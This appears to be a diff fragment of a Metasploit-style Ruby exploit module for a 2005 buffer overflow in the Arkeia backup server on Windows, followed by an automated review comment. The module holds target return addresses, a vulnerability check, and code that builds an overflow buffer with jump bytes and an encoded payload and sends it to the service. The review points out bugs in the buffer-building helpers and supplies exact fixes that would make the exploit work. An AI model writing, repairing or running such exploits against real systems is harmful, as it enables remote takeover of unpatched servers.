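+['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll
+['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll
+],
+'DisclosureDate' => 'Feb 18 2005',
+'DefaultTarget' => 0))
+end
+
+def check
+info = arkeia_info()
+if(not (info and info['Version']))
+return Exploit::CheckCode::Safe
+end
+
+print_status("Arkeia Server Information:")
+info.each_pair { |k,v|
+print_status(" #{k + (" " * (30-k.length))} = #{v}")
+}
+
+if (info['System'] !~ /Windows/)
+print_status("This module only supports Windows targets")
+return Exploit::CheckCode::Detected
+end
+
+if (info['Version'] =~ /Backup (4\.|5\.([012]\.|3\.[0123]$))/)
+return Exploit::CheckCode::Vulnerable
+end
+
+return Exploit::CheckCode::Safe
+end
+
+def exploit
+connect
+head = "\x00\x4d\x00\x03\x00\x01\xff\xff"
+data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()
+head[6, 2] = [data.length].pack('n')
+
+begin
+sock.put(head)
+sock.put(data)
+sock.get_once
+rescue IOError, EOFError => e
+print_status("Exception: #{e.class}:#{e.to_s}")
+end
+handler
+disconnect
+end
+
+def prep_ark5
+data = Rex::Text.rand_text_english(4096, payload_badchars)
+data[1176, 4] = [target['Rets'][0]].pack('V')
+data[1172, 2] = "\xeb\xf9"
+data[1167, 5] = "\xe98" + [-1172].pack('V')
+data[0, payload.encoded.length] = payload.encoded
+end
+
+def prep_ark4
+data = Rex::Text.rand_text_english(4096, payload_badchars)
+seh = generate_seh_payload( target['Rets'][0] )
+data[ 96, seh.length] = seh
+end
+
+end
+end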
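Review bot: prep_ark5 and prep_ark4 return the value of their final element assignment, which in Ruby is the right-hand side (`payload.encoded` and `seh` respectively) rather than `data`, so exploit's `data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()` ends up sending only the payload or the SEH record instead of the 4096-byte buffer the length header is computed for; each helper needs `data` as its last expression before `end`. In prep_ark5, `"\xe98"` is two bytes (`\xe9` consumes two hex digits, so `8` is a literal character), and writing that six-byte string into the five-byte slice `data[1167, 5]` shifts every later byte by one, displacing the `\xeb\xf9` and the return address placed just before it; the deleted Perl line used `"\xe9".pack('V', -1172)`, so this should read `data[1167, 5] = "\xe9" + [-1172].pack('V')`. Carrying the Arkeia major version as the second element of `Rets` is a point of style: a dedicated target key (for example `'ArkeiaVersion' => 5`, name to taste) would read more clearly than overloading the return-address list, and the `5`/`4` literals in `target['Rets'][1] == 5` would then name what they select.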